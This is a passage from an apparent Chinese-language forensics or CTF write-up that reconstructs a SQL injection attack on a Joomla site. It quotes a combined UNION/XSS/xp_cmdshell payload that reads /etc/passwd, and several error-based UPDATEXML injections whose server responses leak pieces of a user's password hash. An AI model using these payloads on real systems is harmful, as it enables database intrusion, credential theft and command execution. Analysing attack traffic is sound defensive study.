XfqR=2916AND1=1UNIONALLSELECT1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
可以看到 XfqR=2916 不成立导致报错产生,从而出来敏感信息。
0x04 第一个受害主机网站数据库的名字
黑客最后一条数据爆出来肯定存在相应的数据库名,例如 from A.BA是数据库名,B是表名。查看最后一条SQL注入信息 解码注入信息可得
1
(UPDATEXML(6315,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(username ASCHAR),0x20)),1,22) FROM joomla.ajtuc_users ORDERBY id LIMIT 0,1),0x71716b6b71),4235))
Status: 500 XPATH syntax error: 'qqzvq$2y$10$lXujU7XaUviJDigqqkkq'SQL=SELECT (UPDATEXML(5928,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password ASCHAR),0x20)),1,22) FROM joomla.ajtuc_users ORDERBY id LIMIT 0,1),0x71716b6b71),7096)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFTJOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` =1AND `h`.`ucm_type_id` =1ORDERBY `h`.`save_date`
Status: 500 XPATH syntax error: 'qqzvqFMzKy6.wx7EMCBqpzrJdn7qqkkq'SQL=SELECT (UPDATEXML(3613,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password ASCHAR),0x20)),23,22) FROM joomla.ajtuc_users ORDERBY id LIMIT 0,1),0x71716b6b71),7939)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFTJOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` =1AND `h`.`ucm_type_id` =1ORDERBY `h`.`save_date`
Status: 500 XPATH syntax error: 'qqzvqzi/8B2QRD7qIlDJeqqkkq'SQL=SELECT (UPDATEXML(8949,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password ASCHAR),0x20)),45,22) FROM joomla.ajtuc_users ORDERBY id LIMIT 0,1),0x71716b6b71),3079)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFTJOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` =1AND `h`.`ucm_type_id` =1ORDERBY `h`.`save_date`